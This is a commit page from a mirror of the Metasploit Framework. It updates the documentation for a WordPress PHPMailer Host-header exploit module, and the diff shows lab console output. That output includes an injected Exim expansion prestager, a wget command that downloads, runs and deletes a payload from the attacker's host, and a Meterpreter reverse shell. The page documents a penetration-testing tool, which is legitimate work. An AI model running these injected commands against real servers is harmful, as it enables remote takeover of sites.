dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update doc with new prestager command

This commit is contained in:
William Vu 2017-05-16 14:29:57 -05:00
parent 7c1dea2f02
commit 3893bc4d83
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md
View File

@ -44,16 +44,16 @@ msf exploit(wp_phpmailer_host_header) > run
[*] Started HTTPS reverse handler on https://192.168.33.1:8443 [*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6 [*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager [*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/gdydmrcr [*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://192.168.1.7:8080/gdydmrcr [*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager [*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${reduce{get /gdydmrcr http/1.0}{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{$item$value$value}}}}}} [*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/kmbrvask${IFS}http://192.168.33.1:8080/gdydmrcr;chmod${IFS}+x${IFS}/tmp/kmbrvask;/tmp/kmbrvask;rm${IFS}-f${IFS}/tmp/kmbrvask [+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https [+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Redirecting stageless connection from /z1Br4gDetykqSyxJc1FJDwUxRwi0zlaU3n8a4qzqQL0car3RRVt6pALb6kN5pFHhGyIHhgaEWcUYZqRQooYIhJarLi5v0 with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: kavaks2e) Attaching orphaned/stageless session... [*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:35848) at 2017-05-15 21:26:17 -0500 [*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/kmbrvask [*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped. [*] Server stopped.
meterpreter > meterpreter >